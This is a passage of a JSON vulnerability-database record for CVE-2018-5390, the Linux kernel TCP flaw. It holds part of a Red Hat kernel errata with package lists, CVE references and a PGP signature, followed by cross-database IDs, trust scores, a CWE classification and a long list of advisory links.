ernel-kdump-devel-3.10.0-862.11.6.el7.s390x.rpm\nperf-3.10.0-862.11.6.el7.s390x.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\npython-perf-3.10.0-862.11.6.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-862.11.6.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-862.11.6.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\nnoarch:\nkernel-doc-3.10.0-862.11.6.el7.noarch.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-862.11.6.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-862.11.6.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm\nkernel-doc-3.10.0-862.11.6.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-headers-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm\nperf-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-13215\nhttps://access.redhat.com/security/cve/CVE-2018-3620\nhttps://access.redhat.com/security/cve/CVE-2018-3646\nhttps://access.redhat.com/security/cve/CVE-2018-3693\nhttps://access.redhat.com/security/cve/CVE-2018-5390\nhttps://access.redhat.com/security/cve/CVE-2018-7566\nhttps://access.redhat.com/security/cve/CVE-2018-10675\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/L1TF\nhttps://access.redhat.com/articles/3527791\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBW3MjONzjgjWX9erEAQioYA/9Ge//K50oCrGaDEMuI2PHYLcztiZt9meh\nC578LP6sC/HT17VAbV8C+Tvy9QBCU80t4mGU4GOPu8Q5HzZQv45n0NtdRTGCC+yb\nA1bFcf0vhXIALNsuDEZN9g5SwUBapxkRoh43R+E7ITCQWp0XIPaSjYgGNqpTTuD/\nlxRCzc10HhxW+pUY+ERFcK6c0poc14FtSqM3GqZe10FhkykdIlmngFjkthjzefXO\ndUkYDy53G+iAdTrVFI03h3Wt+UBMmNwKtu8ydqtAxZ0zDZIP5ijASOtM4mlf77ec\nVsNn7OWythkpTcpa+Sh5+dk6DK+lU2vziVsEocYNpzB+T/aHC9n/+I8ibfp3B4DC\nk4lYqZJQDFR2jVABjkOVS9dWFlOYKFmU2JBwsqdRvt3rgVFXEH3n5OQydHGFskmP\nNFwDbRAFlwo3zjd9KuiQzdFTOensc35+eSHykY8nxY2hGMH5gGccShFL4C7N2mtx\ns8JnzA/Zj00VHMg8qIHGfQ7RSd/xyEJ5vn87WZcTshTNli6x1/0VnzpTKG85Ga+K\nS2EJDXFP9LqCT98TL1RDJmCTtfDjU3I/gbgu5xFaofQZfV48qAUomUQ2E+MhQAOX\neBr/OvlfFP8HEwVEJBDtXKxxs1LgmjTSqOtfP8AvS5zI9/Y6o56i0d7Ng1CcaGKP\nlZgWJhC3Yik=i4St\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 7.3) - ppc64, ppc64le, x86_64\n\n3. Consequently, the node was not available. This\nupdate fixes an irq latency source in memory compaction. As a result, nodes\nno longer get into \"NodeNotReady\" state under the described circumstances. \n(BZ#1596281)\n\n* Previously, the kernel source code was missing support to report the\nSpeculative Store Bypass Disable (SSBD) vulnerability status on IBM Power\nSystems and the little-endian variants of IBM Power Systems. As a\nconsequence, the /sys/devices/system/cpu/vulnerabilities/spec_store_bypass\nfile incorrectly reported \"Not affected\" on both CPU architectures. This\nfix updates the kernel source code to properly report the SSBD status\neither as \"Vulnerable\" or \"Mitigation: Kernel entry/exit barrier (TYPE)\"\nwhere TYPE is one of \"eieio\", \"hwsync\", \"fallback\", or \"unknown\". As a\nconsequence, the VMs sometimes became unresponsive when booting. This\nupdate applies an upstream patch to avoid early microcode update when\nrunning under a hypervisor. As a result, kernel hangs no longer occur in\nthe described scenario. (BZ#1618388)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      },
      {
        "db": "CERT/CC",
        "id": "VU#962459"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "db": "PACKETSTORM",
        "id": "148915"
      },
      {
        "db": "PACKETSTORM",
        "id": "148841"
      },
      {
        "db": "PACKETSTORM",
        "id": "148907"
      },
      {
        "db": "PACKETSTORM",
        "id": "148914"
      },
      {
        "db": "PACKETSTORM",
        "id": "149544"
      },
      {
        "db": "PACKETSTORM",
        "id": "149024"
      },
      {
        "db": "PACKETSTORM",
        "id": "149826"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "db": "PACKETSTORM",
        "id": "148899"
      },
      {
        "db": "PACKETSTORM",
        "id": "149546"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-5390",
        "trust": 2.7
      },
      {
        "db": "CERT/CC",
        "id": "VU#962459",
        "trust": 2.5
      },
      {
        "db": "SECTRACK",
        "id": "1041434",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1041424",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/4",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/3",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/06/28/2",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-377115",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "104976",
        "trust": 1.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10876",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.1328",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2021.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2021",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2497",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1315",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2018.2468.7",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2661",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2262",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-20-105-05",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "149544",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "148841",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "149542",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149545",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149231",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148850",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149310",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-135421",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148915",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148907",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148914",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149024",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149826",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148916",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148899",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149546",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#962459"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "db": "PACKETSTORM",
        "id": "148915"
      },
      {
        "db": "PACKETSTORM",
        "id": "148841"
      },
      {
        "db": "PACKETSTORM",
        "id": "148907"
      },
      {
        "db": "PACKETSTORM",
        "id": "148914"
      },
      {
        "db": "PACKETSTORM",
        "id": "149544"
      },
      {
        "db": "PACKETSTORM",
        "id": "149024"
      },
      {
        "db": "PACKETSTORM",
        "id": "149826"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "db": "PACKETSTORM",
        "id": "148899"
      },
      {
        "db": "PACKETSTORM",
        "id": "149546"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "id": "VAR-201808-1002",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135421"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:20:15.857000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=83981"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-400",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "http://www.securityfocus.com/bid/104976"
      },
      {
        "trust": 2.5,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=1a4f14bab1868b443f0dd3c55b689a478f82e72e"
      },
      {
        "trust": 2.5,
        "url": "https://support.f5.com/csp/article/k95343321"
      },
      {
        "trust": 2.5,
        "url": "https://usn.ubuntu.com/3732-2/"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2384"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2395"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2785"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2790"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2924"
      },
      {
        "trust": 1.7,
        "url": "https://www.kb.cert.org/vuls/id/962459"
      },
      {
        "trust": 1.7,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180824-linux-tcp"
      },
      {
        "trust": 1.7,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-004.txt"
      },
      {
        "trust": 1.7,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181031-02-linux-en"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-377115.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://help.ecostruxureit.com/display/public/uadce725/security+fixes+in+struxureware+data+center+expert+v7.6.0"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20180815-0003/"
      },
      {
        "trust": 1.7,
        "url": "https://www.a10networks.com/support/security-advisories/tcp-ip-cve-2018-5390-segmentsmack"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.synology.com/support/security/synology_sa_18_41"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2018/dsa-4266"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2402"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2403"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2645"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2776"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2789"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2791"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2933"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:2948"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1041424"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1041434"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3732-1/"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3741-1/"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3741-2/"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3742-1/"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3742-2/"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3763-1/"
      },
      {
        "trust": 1.6,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-18:08.tcp.asc"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5390"
      },
      {
        "trust": 1.0,
        "url": "https://support.f5.com/csp/article/k95343321?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 0.8,
        "url": "https://www.spinics.net/lists/netdev/msg514742.html"
      },
      {
        "trust": 0.8,
        "url": "https://supportforums.adtran.com/docs/doc-9261"
      },
      {
        "trust": 0.8,
        "url": "https://blogs.akamai.com/2018/08/linux-kernel-tcp-vulnerability.html"
      },
      {
        "trust": 0.8,
        "url": "https://alas.aws.amazon.com/alas-2018-1049.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/5721-security-advisory-36"
      },
      {
        "trust": 0.8,
        "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk134253"
      },
      {
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-security-announce/2018/msg00195.html"
      },
      {
        "trust": 0.8,
        "url": "https://kb.juniper.net/jsa10876"
      },
      {
        "trust": 0.8,
        "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-686"
      },
      {
        "trust": 0.8,
        "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-696"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/c/suse-addresses-segmentsmack-attack/"
      },
      {
        "trust": 0.8,
        "url": "https://www.zyxel.com/support/linux_kernel_tcp_flaw.shtml"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3646"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5391"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3620"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k95343321?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191437-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191425-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191422-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191767-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191870-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192829-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192821-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20190955-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1315/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2021.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2497/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2661/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2021/"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss?uid=ibm10875814"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/79262"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2262/"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20181031-02-linux-cn"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-105-05"
      },
      {
        "trust": 0.6,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-20-105-05"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/67070"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2018-5390"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/l1tf"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10675"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-10675"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18344"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/vulnerabilities/l1tf"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13215"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-7566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-3620"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-3693"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-13215"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3693"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-3646"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/usn/usn-3741-1"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-5391"
      },
      {
        "trust": 0.1,
        "url": "https://support.f5.com/csp/article/k95343321?utm_source=f5support\u0026amp;amp;utm_medium=rss"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3742-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.13.0-155.205"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1013.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1018.19"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3732-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1017.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1017.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1019.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-30.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1015.15"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-133.159"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1094.102"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1098.103"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1065.75"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1031.37"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3742-2"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3742-3"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1787258"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1787127"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14634"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3553061"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14634"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/mutagen-astronomy"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1027.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-xenial/4.4.0-133.159~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3741-2"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3527791"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#962459"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "db": "PACKETSTORM",
        "id": "148915"
      },
      {
        "db": "PACKETSTORM",
        "id": "148841"
      },
      {
        "db": "PACKETSTORM",
        "id": "148907"
      },
      {
        "db": "PACKETSTORM",
        "id": "148914"
      },
      {
        "db": "PACKETSTORM",
        "id": "149544"
      },
      {
        "db": "PACKETSTORM",
        "id": "149024"
      },
      {
        "db": "PACKETSTORM",
        "id": "149826"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "db": "PACKETSTORM",
        "id": "148899"
      },
      {
        "db": "PACKETSTORM",
        "id": "149546"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#962459"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "db": "PACKETSTORM",
        "id": "148915"
      },
      {
        "db": "PACKETSTORM",
        "id": "148841"
      },
      {
        "db": "PACKETSTORM",
        "id": "148907"
      },
      {
        "db": "PACKETSTORM",
        "id": "148914"
      },
      {
        "db": "PACKETSTORM",
        "id": "149544"
      },
      {
        "db": "PACKETSTORM",
        "id": "149024"
      },
      {
